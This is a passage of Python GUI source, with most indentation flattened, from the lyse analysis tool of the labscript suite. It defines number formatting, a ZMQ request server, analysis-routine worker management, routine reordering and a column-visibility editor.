from labscript_utils.qtwidgets.headerview_with_widgets import HorizontalHeaderViewWithWidgets
from labscript_utils.qtwidgets.outputbox import OutputBox
import labscript_utils.shared_drive as shared_drive
from lyse.dataframe_utilities import (concat_with_padding,
get_dataframe_from_shot,
replace_with_padding)
from qtutils.qt import QtCore, QtGui, QtWidgets
from qtutils.qt.QtCore import pyqtSignal as Signal
from qtutils import inmain_decorator, inmain, UiLoader, DisconnectContextManager
from qtutils.auto_scroll_to_end import set_auto_scroll_to_end
import qtutils.icons
from labscript_utils import PY2
if PY2:
str = unicode
import Queue as queue
else:
import queue
from lyse import LYSE_DIR
process_tree = ProcessTree.instance()
# Set a meaningful name for zlock client id:
process_tree.zlock_client.set_process_name('lyse')
def set_win_appusermodel(window_id):
from labscript_utils.winshell import set_appusermodel, appids, app_descriptions
icon_path = os.path.join(LYSE_DIR, 'lyse.ico')
executable = sys.executable.lower()
if not executable.endswith('w.exe'):
executable = executable.replace('.exe', 'w.exe')
relaunch_command = executable + ' ' + os.path.join(LYSE_DIR, '__main__.py')
relaunch_display_name = app_descriptions['lyse']
set_appusermodel(window_id, appids['lyse'], icon_path, relaunch_command, relaunch_display_name)
@inmain_decorator()
def error_dialog(message):
QtWidgets.QMessageBox.warning(app.ui, 'lyse', message)
@inmain_decorator()
def question_dialog(message):
reply = QtWidgets.QMessageBox.question(app.ui, 'lyse', message,
QtWidgets.QMessageBox.Yes | QtWidgets.QMessageBox.No)
return (reply == QtWidgets.QMessageBox.Yes)
def scientific_notation(x, sigfigs=4, mode='eng'):
"""Returns a unicode string of the float f in scientific notation"""
times = u'\u00d7'
thinspace = u'\u2009'
hairspace = u'\u200a'
sups = {u'-': u'\u207b',
u'0': u'\u2070',
u'1': u'\xb9',
u'2': u'\xb2',
u'3': u'\xb3',
u'4': u'\u2074',
u'5': u'\u2075',
u'6': u'\u2076',
u'7': u'\u2077',
u'8': u'\u2078',
u'9': u'\u2079'}
prefixes = {
-24: u"y",
-21: u"z",
-18: u"a",
-15: u"f",
-12: u"p",
-9: u"n",
-6: u"\u03bc",
-3: u"m",
0: u"",
3: u"k",
6: u"M",
9: u"G",
12: u"T",
15: u"P",
18: u"E",
21: u"Z",
24: u"Y"
}
if not isinstance(x, float):
        raise TypeError('x must be a floating point number')
if np.isnan(x) or np.isinf(x):
return str(x)
if x != 0:
exponent = int(np.floor(np.log10(np.abs(x))))
# Only multiples of 10^3
exponent = int(np.floor(exponent / 3) * 3)
else:
exponent = 0
significand = x / 10 ** exponent
pre_decimal, post_decimal = divmod(significand, 1)
digits = sigfigs - len(str(int(pre_decimal)))
significand = round(significand, digits)
result = str(significand)
if exponent:
if mode == 'exponential':
superscript = ''.join(sups.get(char, char) for char in str(exponent))
result += thinspace + times + thinspace + '10' + superscript
elif mode == 'eng':
try:
# If our number has an SI prefix then use it
prefix = prefixes[exponent]
result += hairspace + prefix
except KeyError:
# Otherwise display in scientific notation
superscript = ''.join(sups.get(char, char) for char in str(exponent))
result += thinspace + times + thinspace + '10' + superscript
return result
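# Example outputs (illustrative; the separators are unicode thin/hair spaces,
# shown here as plain spaces):
#   scientific_notation(1234.5)                      -> '1.234 k'
#   scientific_notation(1234.5, mode='exponential')  -> '1.234 × 10³'
#   scientific_notation(0.0)                         -> '0.0'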
def get_screen_geometry():
"""Return the a list of the geometries of each screen: each a tuple of
left, top, width and height"""
geoms = []
desktop = qapplication.desktop()
for i in range(desktop.screenCount()):
sg = desktop.screenGeometry(i)
geoms.append((sg.left(), sg.top(), sg.width(), sg.height()))
return geoms
class WebServer(ZMQServer):
def handler(self, request_data):
logger.info('WebServer request: %s' % str(request_data))
if request_data == 'hello':
return 'hello'
elif request_data == 'get dataframe':
# infer_objects() picks fixed datatypes for columns that are compatible with
# fixed datatypes, dramatically speeding up pickling. It is called here
# rather than when updating the dataframe as calling it during updating may
# call it needlessly often, whereas it only needs to be called prior to
# sending the dataframe to a client requesting it, as we're doing now.
app.filebox.shots_model.infer_objects()
return app.filebox.shots_model.dataframe
elif isinstance(request_data, dict):
if 'filepath' in request_data:
h5_filepath = shared_drive.path_to_local(request_data['filepath'])
if isinstance(h5_filepath, bytes):
h5_filepath = h5_filepath.decode('utf8')
if not isinstance(h5_filepath, str):
raise AssertionError(str(type(h5_filepath)) + ' is not str or bytes')
app.filebox.incoming_queue.put(h5_filepath)
return 'added successfully'
elif isinstance(request_data, str):
# Just assume it's a filepath:
app.filebox.incoming_queue.put(shared_drive.path_to_local(request_data))
return "Experiment added successfully\n"
return ("error: operation not supported. Recognised requests are:\n "
"'get dataframe'\n 'hello'\n {'filepath': <some_h5_filepath>}")
class LyseMainWindow(QtWidgets.QMainWindow):
# A signal to show that the window is shown and painted.
firstPaint = Signal()
# A signal for when the window manager has created a new window for this widget:
newWindow = Signal(int)
def __init__(self, *args, **kwargs):
QtWidgets.QMainWindow.__init__(self, *args, **kwargs)
self._previously_painted = False
self.closing = False
def closeEvent(self, event):
if self.closing:
return QtWidgets.QMainWindow.closeEvent(self, event)
if app.on_close_event():
self.closing = True
timeout_time = time.time() + 2
self.delayedClose(timeout_time)
event.ignore()
def delayedClose(self, timeout_time):
if not all(app.workers_terminated().values()) and time.time() < timeout_time:
QtCore.QTimer.singleShot(50, lambda: self.delayedClose(timeout_time))
else:
QtCore.QTimer.singleShot(0, self.close)
def event(self, event):
result = QtWidgets.QMainWindow.event(self, event)
if event.type() == QtCore.QEvent.WinIdChange:
self.newWindow.emit(self.effectiveWinId())
return result
def paintEvent(self, event):
result = QtWidgets.QMainWindow.paintEvent(self, event)
if not self._previously_painted:
self._previously_painted = True
self.firstPaint.emit()
return result
class AnalysisRoutine(object):
def __init__(self, filepath, model, output_box_port, checked=QtCore.Qt.Checked):
self.filepath = filepath
self.shortname = os.path.basename(self.filepath)
self.model = model
self.output_box_port = output_box_port
self.COL_ACTIVE = RoutineBox.COL_ACTIVE
self.COL_STATUS = RoutineBox.COL_STATUS
self.COL_NAME = RoutineBox.COL_NAME
self.ROLE_FULLPATH = RoutineBox.ROLE_FULLPATH
self.error = False
self.done = False
self.to_worker, self.from_worker, self.worker = self.start_worker()
# Make a row to put into the model:
active_item = QtGui.QStandardItem()
active_item.setCheckable(True)
active_item.setCheckState(checked)
info_item = QtGui.QStandardItem()
name_item = QtGui.QStandardItem(self.shortname)
name_item.setToolTip(self.filepath)
name_item.setData(self.filepath, self.ROLE_FULLPATH)
self.model.appendRow([active_item, info_item, name_item])
self.exiting = False
def start_worker(self):
# Start a worker process for this analysis routine:
worker_path = os.path.join(LYSE_DIR, 'analysis_subprocess.py')
child_handles = process_tree.subprocess(
worker_path,
output_redirection_port=self.output_box_port,
startup_timeout=30,
)
to_worker, from_worker, worker = child_handles
        # Tell the worker what script it will be executing:
to_worker.put(self.filepath)
return to_worker, from_worker, worker
def do_analysis(self, filepath):
self.to_worker.put(['analyse', filepath])
signal, data = self.from_worker.get()
if signal == 'error':
return False, data
elif signal == 'done':
return True, data
else:
raise ValueError('invalid signal %s'%str(signal))
@inmain_decorator()
def set_status(self, status):
index = self.get_row_index()
if index is None:
# Yelp, we've just been deleted. Nothing to do here.
return
status_item = self.model.item(index, self.COL_STATUS)
if status == 'done':
status_item.setIcon(QtGui.QIcon(':/qtutils/fugue/tick'))
self.done = True
self.error = False
elif status == 'working':
status_item.setIcon(QtGui.QIcon(':/qtutils/fugue/hourglass'))
self.done = False
self.error = False
elif status == 'error':
status_item.setIcon(QtGui.QIcon(':/qtutils/fugue/exclamation'))
self.error = True
self.done = False
elif status == 'clear':
status_item.setData(None, QtCore.Qt.DecorationRole)
self.done = False
self.error = False
else:
raise ValueError(status)
@inmain_decorator()
def enabled(self):
index = self.get_row_index()
if index is None:
# Yelp, we've just been deleted.
return False
enabled_item = self.model.item(index, self.COL_ACTIVE)
return (enabled_item.checkState() == QtCore.Qt.Checked)
def get_row_index(self):
"""Returns the row index for this routine's row in the model"""
for row in range(self.model.rowCount()):
name_item = self.model.item(row, self.COL_NAME)
fullpath = name_item.data(self.ROLE_FULLPATH)
if fullpath == self.filepath:
return row
def restart(self):
# TODO set status to 'restarting' or an icon or something, and gray out the item?
self.end_child(restart=True)
def remove(self):
"""End the child process and remove from the treeview"""
self.end_child()
index = self.get_row_index()
if index is None:
# Already gone
return
self.model.removeRow(index)
def end_child(self, restart=False):
self.to_worker.put(['quit', None])
timeout_time = time.time() + 2
self.exiting = True
QtCore.QTimer.singleShot(50,
lambda: self.check_child_exited(self.worker, timeout_time, kill=False, restart=restart))
def check_child_exited(self, worker, timeout_time, kill=False, restart=False):
worker.poll()
if worker.returncode is None and time.time() < timeout_time:
QtCore.QTimer.singleShot(50,
lambda: self.check_child_exited(worker, timeout_time, kill, restart))
return
elif worker.returncode is None:
if not kill:
worker.terminate()
app.output_box.output('%s worker not responding.\n'%self.shortname)
timeout_time = time.time() + 2
QtCore.QTimer.singleShot(50,
lambda: self.check_child_exited(worker, timeout_time, kill=True, restart=restart))
return
else:
worker.kill()
app.output_box.output('%s worker killed\n'%self.shortname, red=True)
elif kill:
app.output_box.output('%s worker terminated\n'%self.shortname, red=True)
else:
app.output_box.output('%s worker exited cleanly\n'%self.shortname)
        # If analysis was running, notify the analysis loop that analysis has failed:
self.from_worker.put(('error', {}))
if restart:
self.to_worker, self.from_worker, self.worker = self.start_worker()
app.output_box.output('%s worker restarted\n'%self.shortname)
self.exiting = False
class TreeView(QtWidgets.QTreeView):
leftClicked = Signal(QtCore.QModelIndex)
doubleLeftClicked = Signal(QtCore.QModelIndex)
"""A QTreeView that emits a custom signal leftClicked(index) after a left
click on a valid index, and doubleLeftClicked(index) (in addition) on
double click."""
def __init__(self, *args):
QtWidgets.QTreeView.__init__(self, *args)
self._pressed_index = None
self._double_click = False
def mousePressEvent(self, event):
result = QtWidgets.QTreeView.mousePressEvent(self, event)
index = self.indexAt(event.pos())
if event.button() == QtCore.Qt.LeftButton and index.isValid():
self._pressed_index = self.indexAt(event.pos())
return result
def leaveEvent(self, event):
result = QtWidgets.QTreeView.leaveEvent(self, event)
self._pressed_index = None
self._double_click = False
return result
def mouseDoubleClickEvent(self, event):
# Ensure our left click event occurs regardless of whether it is the
# second click in a double click or not
result = QtWidgets.QTreeView.mouseDoubleClickEvent(self, event)
index = self.indexAt(event.pos())
if event.button() == QtCore.Qt.LeftButton and index.isValid():
self._pressed_index = self.indexAt(event.pos())
self._double_click = True
return result
def mouseReleaseEvent(self, event):
result = QtWidgets.QTreeView.mouseReleaseEvent(self, event)
index = self.indexAt(event.pos())
if event.button() == QtCore.Qt.LeftButton and index.isValid() and index == self._pressed_index:
self.leftClicked.emit(index)
if self._double_click:
self.doubleLeftClicked.emit(index)
self._pressed_index = None
self._double_click = False
return result
class RoutineBox(object):
COL_ACTIVE = 0
COL_STATUS = 1
COL_NAME = 2
ROLE_FULLPATH = QtCore.Qt.UserRole + 1
# This data (stored in the name item) does not necessarily match
# the position in the model. It will be set just
# prior to sort() being called with this role as the sort data.
# This is how we will reorder the model's rows instead of
# using remove/insert.
ROLE_SORTINDEX = QtCore.Qt.UserRole + 2
def __init__(self, container, exp_config, filebox, from_filebox, to_filebox, output_box_port, multishot=False):
self.multishot = multishot
self.filebox = filebox
self.exp_config = exp_config
self.from_filebox = from_filebox
self.to_filebox = to_filebox
self.output_box_port = output_box_port
self.logger = logging.getLogger('lyse.RoutineBox.%s'%('multishot' if multishot else 'singleshot'))
loader = UiLoader()
loader.registerCustomWidget(TreeView)
self.ui = loader.load(os.path.join(LYSE_DIR, 'routinebox.ui'))
container.addWidget(self.ui)
if multishot:
self.ui.groupBox.setTitle('Multishot routines')
else:
self.ui.groupBox.setTitle('Singleshot routines')
self.model = UneditableModel()
self.header = HorizontalHeaderViewWithWidgets(self.model)
self.ui.treeView.setHeader(self.header)
self.ui.treeView.setModel(self.model)
active_item = QtGui.QStandardItem()
active_item.setToolTip('Whether the analysis routine should run')
status_item = QtGui.QStandardItem()
status_item.setIcon(QtGui.QIcon(':qtutils/fugue/information'))
        status_item.setToolTip('The status of this analysis routine\'s execution')
name_item = QtGui.QStandardItem('name')
name_item.setToolTip('The name of the python script for the analysis routine')
self.select_all_checkbox = QtWidgets.QCheckBox()
        self.select_all_checkbox.setToolTip('Whether the analysis routine should run')
self.header.setWidget(self.COL_ACTIVE, self.select_all_checkbox)
self.header.setStretchLastSection(True)
self.select_all_checkbox.setTristate(False)
self.model.setHorizontalHeaderItem(self.COL_ACTIVE, active_item)
self.model.setHorizontalHeaderItem(self.COL_STATUS, status_item)
self.model.setHorizontalHeaderItem(self.COL_NAME, name_item)
self.model.setSortRole(self.ROLE_SORTINDEX)
self.ui.treeView.resizeColumnToContents(self.COL_ACTIVE)
self.ui.treeView.resizeColumnToContents(self.COL_STATUS)
self.ui.treeView.setColumnWidth(self.COL_NAME, 200)
self.ui.treeView.setContextMenuPolicy(QtCore.Qt.CustomContextMenu)
# Make the actions for the context menu:
self.action_set_selected_active = QtWidgets.QAction(
QtGui.QIcon(':qtutils/fugue/ui-check-box'), 'set selected routines active', self.ui)
self.action_set_selected_inactive = QtWidgets.QAction(
QtGui.QIcon(':qtutils/fugue/ui-check-box-uncheck'), 'set selected routines inactive', self.ui)
self.action_restart_selected = QtWidgets.QAction(
QtGui.QIcon(':qtutils/fugue/arrow-circle'), 'restart worker process for selected routines', self.ui)
self.action_remove_selected = QtWidgets.QAction(
QtGui.QIcon(':qtutils/fugue/minus'), 'Remove selected routines', self.ui)
self.last_opened_routine_folder = self.exp_config.get('paths', 'analysislib')
self.routines = []
self.connect_signals()
self.analysis = threading.Thread(target = self.analysis_loop)
self.analysis.daemon = True
self.analysis.start()
def connect_signals(self):
self.ui.toolButton_add_routines.clicked.connect(self.on_add_routines_clicked)
self.ui.toolButton_remove_routines.clicked.connect(self.on_remove_selection)
self.model.itemChanged.connect(self.on_model_item_changed)
self.ui.treeView.doubleLeftClicked.connect(self.on_treeview_double_left_clicked)
# A context manager with which we can temporarily disconnect the above connection.
self.model_item_changed_disconnected = DisconnectContextManager(
self.model.itemChanged, self.on_model_item_changed)
self.select_all_checkbox.stateChanged.connect(self.on_select_all_state_changed)
self.select_all_checkbox_state_changed_disconnected = DisconnectContextManager(
self.select_all_checkbox.stateChanged, self.on_select_all_state_changed)
self.ui.treeView.customContextMenuRequested.connect(self.on_treeView_context_menu_requested)
self.action_set_selected_active.triggered.connect(
lambda: self.on_set_selected_triggered(QtCore.Qt.Checked))
self.action_set_selected_inactive.triggered.connect(
lambda: self.on_set_selected_triggered(QtCore.Qt.Unchecked))
self.action_restart_selected.triggered.connect(self.on_restart_selected_triggered)
self.action_remove_selected.triggered.connect(self.on_remove_selection)
self.ui.toolButton_move_to_top.clicked.connect(self.on_move_to_top_clicked)
self.ui.toolButton_move_up.clicked.connect(self.on_move_up_clicked)
self.ui.toolButton_move_down.clicked.connect(self.on_move_down_clicked)
self.ui.toolButton_move_to_bottom.clicked.connect(self.on_move_to_bottom_clicked)
def on_add_routines_clicked(self):
routine_files = QtWidgets.QFileDialog.getOpenFileNames(self.ui,
'Select analysis routines',
self.last_opened_routine_folder,
"Python scripts (*.py)")
if type(routine_files) is tuple:
routine_files, _ = routine_files
if not routine_files:
# User cancelled selection
return
# Convert to standard platform specific path, otherwise Qt likes forward slashes:
routine_files = [os.path.abspath(routine_file) for routine_file in routine_files]
# Save the containing folder for use next time we open the dialog box:
self.last_opened_routine_folder = os.path.dirname(routine_files[0])
self.add_routines([(routine_file, QtCore.Qt.Checked) for routine_file in routine_files])
def add_routines(self, routine_files, clear_existing=False):
"""Add routines to the routine box, where routine_files is a list of
tuples containing the filepath and whether the routine is enabled or
not when it is added. if clear_existing == True, then any existing
analysis routines will be cleared before the new ones are added."""
if clear_existing:
for routine in self.routines[:]:
routine.remove()
self.routines.remove(routine)
# Queue the files to be opened:
for filepath, checked in routine_files:
if filepath in [routine.filepath for routine in self.routines]:
app.output_box.output('Warning: Ignoring duplicate analysis routine %s\n'%filepath, red=True)
continue
routine = AnalysisRoutine(filepath, self.model, self.output_box_port, checked)
self.routines.append(routine)
self.update_select_all_checkstate()
def on_treeview_double_left_clicked(self, index):
        # If double clicking on the name item, open
# the routine in the specified text editor:
if index.column() != self.COL_NAME:
return
name_item = self.model.item(index.row(), self.COL_NAME)
routine_filepath = name_item.data(self.ROLE_FULLPATH)
# get path to text editor
editor_path = self.exp_config.get('programs', 'text_editor')
editor_args = self.exp_config.get('programs', 'text_editor_arguments')
        # Check that a text editor is configured before trying to launch it:
        if not editor_path:
            error_dialog("No editor specified in the labconfig.")
            return
if '{file}' in editor_args:
# Split the args on spaces into a list, replacing {file} with the labscript file
editor_args = [arg if arg != '{file}' else routine_filepath for arg in editor_args.split()]
else:
# Otherwise if {file} isn't already in there, append it to the other args:
editor_args = [routine_filepath] + editor_args.split()
try:
subprocess.Popen([editor_path] + editor_args)
except Exception as e:
error_dialog("Unable to launch text editor specified in %s. Error was: %s" %
(self.exp_config.config_path, str(e)))
def on_remove_selection(self):
self.remove_selection()
def remove_selection(self, confirm=True):
selected_indexes = self.ui.treeView.selectedIndexes()
selected_rows = set(index.row() for index in selected_indexes)
if not selected_rows:
return
if confirm and not question_dialog("Remove %d routines?" % len(selected_rows)):
return
name_items = [self.model.item(row, self.COL_NAME) for row in selected_rows]
filepaths = [item.data(self.ROLE_FULLPATH) for item in name_items]
for routine in self.routines[:]:
if routine.filepath in filepaths:
routine.remove()
self.routines.remove(routine)
self.update_select_all_checkstate()
def on_model_item_changed(self, item):
if item.column() == self.COL_ACTIVE:
self.update_select_all_checkstate()
def on_select_all_state_changed(self, state):
with self.select_all_checkbox_state_changed_disconnected:
# Do not allow a switch *to* a partially checked state:
self.select_all_checkbox.setTristate(False)
state = self.select_all_checkbox.checkState()
with self.model_item_changed_disconnected:
for row in range(self.model.rowCount()):
active_item = self.model.item(row, self.COL_ACTIVE)
active_item.setCheckState(state)
def on_treeView_context_menu_requested(self, point):
menu = QtWidgets.QMenu(self.ui.treeView)
menu.addAction(self.action_set_selected_active)
menu.addAction(self.action_set_selected_inactive)
menu.addAction(self.action_restart_selected)
menu.addAction(self.action_remove_selected)
menu.exec_(QtGui.QCursor.pos())
def on_set_selected_triggered(self, active):
selected_indexes = self.ui.treeView.selectedIndexes()
selected_rows = set(index.row() for index in selected_indexes)
for row in selected_rows:
active_item = self.model.item(row, self.COL_ACTIVE)
active_item.setCheckState(active)
self.update_select_all_checkstate()
def on_move_to_top_clicked(self):
selected_indexes = self.ui.treeView.selectedIndexes()
selected_rows = set(index.row() for index in selected_indexes)
n = self.model.rowCount()
i_selected = 0
i_unselected = len(selected_rows)
order = []
for i in range(n):
if i in selected_rows:
order.append(i_selected)
i_selected += 1
else:
order.append(i_unselected)
i_unselected += 1
self.reorder(order)
def on_move_up_clicked(self):
selected_indexes = self.ui.treeView.selectedIndexes()
selected_rows = set(index.row() for index in selected_indexes)
n = self.model.rowCount()
order = []
last_unselected_index = None
for i in range(n):
if i in selected_rows:
if last_unselected_index is None:
order.append(i)
else:
order.append(i - 1)
order[last_unselected_index] += 1
else:
last_unselected_index = i
order.append(i)
self.reorder(order)
def on_move_down_clicked(self):
selected_indexes = self.ui.treeView.selectedIndexes()
selected_rows = set(index.row() for index in selected_indexes)
n = self.model.rowCount()
order = []
last_unselected_index = None
for i in reversed(range(n)):
if i in selected_rows:
if last_unselected_index is None:
order.insert(0, i)
else:
order.insert(0, i + 1)
order[last_unselected_index - n] -= 1
else:
last_unselected_index = i
order.insert(0, i)
self.reorder(order)
def on_move_to_bottom_clicked(self):
selected_indexes = self.ui.treeView.selectedIndexes()
selected_rows = set(index.row() for index in selected_indexes)
n = self.model.rowCount()
i_selected = n - len(selected_rows)
i_unselected = 0
order = []
for i in range(n):
if i in selected_rows:
order.append(i_selected)
i_selected += 1
else:
order.append(i_unselected)
i_unselected += 1
self.reorder(order)
def on_restart_selected_triggered(self):
selected_indexes = self.ui.treeView.selectedIndexes()
selected_rows = set(index.row() for index in selected_indexes)
name_items = [self.model.item(row, self.COL_NAME) for row in selected_rows]
filepaths = [item.data(self.ROLE_FULLPATH) for item in name_items]
for routine in self.routines:
if routine.filepath in filepaths:
routine.restart()
self.update_select_all_checkstate()
def analysis_loop(self):
while True:
filepath = self.from_filebox.get()
if self.multishot:
assert filepath is None
# TODO: get the filepath of the output h5 file:
# filepath = self.filechooserentry.get_text()
self.logger.info('got a file to process: %s'%filepath)
self.do_analysis(filepath)
def todo(self):
"""How many analysis routines are not done?"""
return len([r for r in self.routines if r.enabled() and not r.done])
def do_analysis(self, filepath):
"""Run all analysis routines once on the given filepath,
which is a shot file if we are a singleshot routine box"""
for routine in self.routines:
routine.set_status('clear')
remaining = self.todo()
error = False
updated_data = {}
while remaining:
self.logger.debug('%d routines left to do'%remaining)
for routine in self.routines:
if routine.enabled() and not routine.done:
break
else:
routine = None
if routine is not None:
self.logger.info('running analysis routine %s'%routine.shortname)
routine.set_status('working')
success, updated_data = routine.do_analysis(filepath)
if success:
routine.set_status('done')
self.logger.debug('success')
else:
routine.set_status('error')
self.logger.debug('failure')
error = True
break
# Race conditions here, but it's only for reporting percent done
# so it doesn't matter if it's wrong briefly:
remaining = self.todo()
total = len([r for r in self.routines if r.enabled()])
done = total - remaining
try:
status_percent = 100*float(done)/(remaining + done)
except ZeroDivisionError:
# All routines got deleted mid-analysis, we're done here:
status_percent = 100.0
self.to_filebox.put(['progress', status_percent, updated_data])
if error:
self.to_filebox.put(['error', None, updated_data])
else:
self.to_filebox.put(['done', 100.0, {}])
self.logger.debug('completed analysis of %s'%filepath)
def reorder(self, order):
assert len(order) == len(set(order)), 'ordering contains non-unique elements'
# Apply the reordering to the liststore:
for old_index, new_index in enumerate(order):
name_item = self.model.item(old_index, self.COL_NAME)
name_item.setData(new_index, self.ROLE_SORTINDEX)
self.ui.treeView.sortByColumn(self.COL_NAME, QtCore.Qt.AscendingOrder)
# Apply new order to our list of routines too:
self.routines = [self.routines[order.index(i)] for i in range(len(order))]
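        # For example (illustrative only): with routines [A, B, C] and
        # order = [2, 0, 1], A receives sort index 2, B index 0 and C index 1,
        # so after sorting the view shows [B, C, A], and self.routines is
        # permuted to match.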
def update_select_all_checkstate(self):
with self.select_all_checkbox_state_changed_disconnected:
all_states = []
for row in range(self.model.rowCount()):
active_item = self.model.item(row, self.COL_ACTIVE)
all_states.append(active_item.checkState())
if all(state == QtCore.Qt.Checked for state in all_states):
self.select_all_checkbox.setCheckState(QtCore.Qt.Checked)
elif all(state == QtCore.Qt.Unchecked for state in all_states):
self.select_all_checkbox.setCheckState(QtCore.Qt.Unchecked)
else:
self.select_all_checkbox.setCheckState(QtCore.Qt.PartiallyChecked)
class EditColumnsDialog(QtWidgets.QDialog):
# A signal for when the window manager has created a new window for this widget:
newWindow = Signal(int)
close_signal = Signal()
def __init__(self):
QtWidgets.QDialog.__init__(self, None, QtCore.Qt.WindowSystemMenuHint | QtCore.Qt.WindowTitleHint)
def event(self, event):
result = QtWidgets.QDialog.event(self, event)
if event.type() == QtCore.QEvent.WinIdChange:
self.newWindow.emit(self.effectiveWinId())
return result
def closeEvent(self, event):
self.close_signal.emit()
event.ignore()
class EditColumns(object):
ROLE_SORT_DATA = QtCore.Qt.UserRole + 1
COL_VISIBLE = 0
COL_NAME = 1
def __init__(self, filebox, column_names, columns_visible):
self.filebox = filebox
self.column_names = column_names.copy()
self.columns_visible = columns_visible.copy()
self.old_columns_visible = columns_visible.copy()
loader = UiLoader()
self.ui = loader.load(os.path.join(LYSE_DIR, 'edit_columns.ui'), EditColumnsDialog())
self.model = UneditableModel()
self.header = HorizontalHeaderViewWithWidgets(self.model)
self.select_all_checkbox = QtWidgets.QCheckBox()
self.select_all_checkbox.setTristate(False)
self.ui.treeView.setHeader(self.header)
self.proxy_model = QtCore.QSortFilterProxyModel()
self.proxy_model.setSourceModel(self.model)
self.proxy_model.setFilterCaseSensitivity(QtCore.Qt.CaseInsensitive)
self.proxy_model.setFilterKeyColumn(self.COL_NAME)
self.ui.treeView.setSortingEnabled(True)
self.header.setStretchLastSection(True)
self.proxy_model.setSortRole(self.ROLE_SORT_DATA)
self.ui.treeView.setModel(self.proxy_model)
self.ui.setWindowModality(QtCore.Qt.ApplicationModal)
self.ui.treeView.setContextMenuPolicy(QtCore.Qt.CustomContextMenu)
# Make the actions for the context menu:
self.action_set_selected_visible = QtWidgets.QAction(
QtGui.QIcon(':qtutils/fugue/ui-check-box'), 'Show selected columns', self.ui)
self.action_set_selected_hidden = QtWidgets.QAction(
QtGui.QIcon(':qtutils/fugue/ui-check-box-uncheck'), 'Hide selected columns', self.ui)
self.connect_signals()
self.populate_model(column_names, self.columns_visible)
def connect_signals(self):
if os.name == 'nt':
self.ui.newWindow.connect(set_win_appusermodel)
self.ui.close_signal.connect(self.close)
self.ui.lineEdit_filter.textEdited.connect(self.on_filter_text_edited)
self.ui.pushButton_make_it_so.clicked.connect(self.make_it_so)
self.ui.pushButton_cancel.clicked.connect(self.cancel)
self.model.itemChanged.connect(self.on_model_item_changed)
# A context manager with which we can temporarily disconnect the above connection.
self.model_item_changed_disconnected = DisconnectContextManager(
self.model.itemChanged, self.on_model_item_changed)
self.select_all_checkbox.stateChanged.connect(self.on_select_all_state_changed)
self.select_all_checkbox_state_changed_disconnected = DisconnectContextManager(
self.select_all_checkbox.stateChanged, self.on_select_all_state_changed)
self.ui.treeView.customContextMenuRequested.connect(self.on_treeView_context_menu_requested)
self.action_set_selected_visible.triggered.connect(
lambda: self.on_set_selected_triggered(QtCore.Qt.Checked))
self.action_set_selected_hidden.triggered.connect(
lambda: self.on_set_selected_triggered(QtCore.Qt.Unchecked))
def populate_model(self, column_names, columns_visible):
self.model.clear()
self.model.setHorizontalHeaderLabels(['', 'Name'])
self.header.setWidget(self.COL_VISIBLE, self.select_all_checkbox)
self.ui.treeView.resizeColumnToContents(self.COL_VISIBLE)
# Which indices in self.columns_visible the row numbers correspond to
self.column_indices = {}
# Remove our special columns from the dict of column names by keeping only tuples:
column_names = {i: name for i, name in column_names.items() if isinstance(name, tuple)}
# Sort the column names as comma separated values, converting to lower case:
sortkey = lambda item: ', '.join(item[1]).lower().strip(', ')
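        # e.g. the name tuple ('Alice', 'Bob', '') sorts under the key 'alice, bob'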
for column_index, name in sorted(column_names.items(), key=sortkey):
visible = columns_visible[column_index]
visible_item = QtGui.QStandardItem()
visible_item.setCheckable(True)
if visible:
visible_item.setCheckState(QtCore.Qt.Checked)
visible_item.setData(QtCore.Qt.Checked, self.ROLE_SORT_DATA)
else:
visible_item.setCheckState(QtCore.Qt.Unchecked)
visible_item.setData(QtCore.Qt.Unchecked, self.ROLE_SORT_DATA)
name_as_string = ', '.join(name).strip(', ')
name_item = QtGui.QStandardItem(name_as_string)
name_item.setData(sortkey((column_index, name)), self.ROLE_SORT_DATA)
self.model.appendRow([visible_item, name_item])
self.column_indices[self.model.rowCount() - 1] = column_index
self.ui.treeView.resizeColumnToContents(self.COL_NAME)
self.update_select_all_checkstate()
self.ui.treeView.sortByColumn(self.COL_NAME, QtCore.Qt.AscendingOrder)
def on_treeView_context_menu_requested(self, point):
menu = QtWidgets.QMenu(self.ui)
menu.addAction(self.action_set_selected_visible)
menu.addAction(self.action_set_selected_hidden)
menu.exec_(QtGui.QCursor.pos())
def on_set_selected_triggered(self, visible):
selected_indexes = self.ui.treeView.selectedIndexes()
selected_rows = set(self.proxy_model.mapToSource(index).row() for index in selected_indexes)
for row in selected_rows:
visible_item = self.model.item(row, self.COL_VISIBLE)
self.update_visible_state(visible_item, visible)
self.update_select_all_checkstate()
self.do_sort()
self.filebox.set_columns_visible(self.columns_visible)
def on_filter_text_edited(self, text):
self.proxy_model.setFilterWildcard(text)
def on_select_all_state_changed(self, state):
with self.select_all_checkbox_state_changed_disconnected:
# Do not allow a switch *to* a partially checked state:
self.select_all_checkbox.setTristate(False)
state = self.select_all_checkbox.checkState()
for row in range(self.model.rowCount()):
visible_item = self.model.item(row, self.COL_VISIBLE)
self.update_visible_state(visible_item, state)
self.do_sort()
self.filebox.set_columns_visible(self.columns_visible)
def update_visible_state(self, item, state):
assert item.column() == self.COL_VISIBLE, "unexpected column"
row = item.row()
with self.model_item_changed_disconnected:
item.setCheckState(state)
item.setData(state, self.ROLE_SORT_DATA)
if state == QtCore.Qt.Checked:
self.columns_visible[self.column_indices[row]] = True
else:
self.columns_visible[self.column_indices[row]] = False
def update_select_all_checkstate(self):
with self.select_all_checkbox_state_changed_disconnected:
all_states = []
for row in range(self.model.rowCount()):
visible_item = self.model.item(row, self.COL_VISIBLE)
all_states.append(visible_item.checkState())
if all(state == QtCore.Qt.Checked for state in all_states):
self.select_all_checkbox.setCheckState(QtCore.Qt.Checked)
elif all(state == QtCore.Qt.Unchecked for state in all_states):
self.select_all_checkbox.setCheckState(QtCore.Qt.Unchecked)
else:
self.select_all_checkbox.setCheckState(QtCore.Qt.PartiallyChecked)
def on_model_item_changed(self, item):
state = item.checkState()
self.update_visible_state(item, state)
self.update_select_all_checkstate()
self.do_sort()
self.filebox.set_columns_visible(self.columns_visible)
def do_sort(self):
header = self.ui.treeView.header()
sort_column = header.sortIndicatorSection()
sort_order = header.sortIndicatorOrder()
self.ui.treeView.sortByColumn(sort_column, sort_order)
def update_columns(self, column_names, columns_visible):
# Index/name mapping may have changed. Get a mapping by *name* of
# which columns were previously visible, so we can update our by-index
# mapping in a moment:
old_columns_visible_by_name = {}
for old_column_number, visible in self.old_columns_visible.items():
column_name = self.column_names[old_column_number]
old_columns_visible_by_name[column_name] = visible
self.columns_visible = columns_visible.copy()
self.column_names = column_names.copy()
# Update the by-index mapping of which columns were visible before editing:
self.old_columns_visible = {}
for index, name in self.column_names.items():
try:
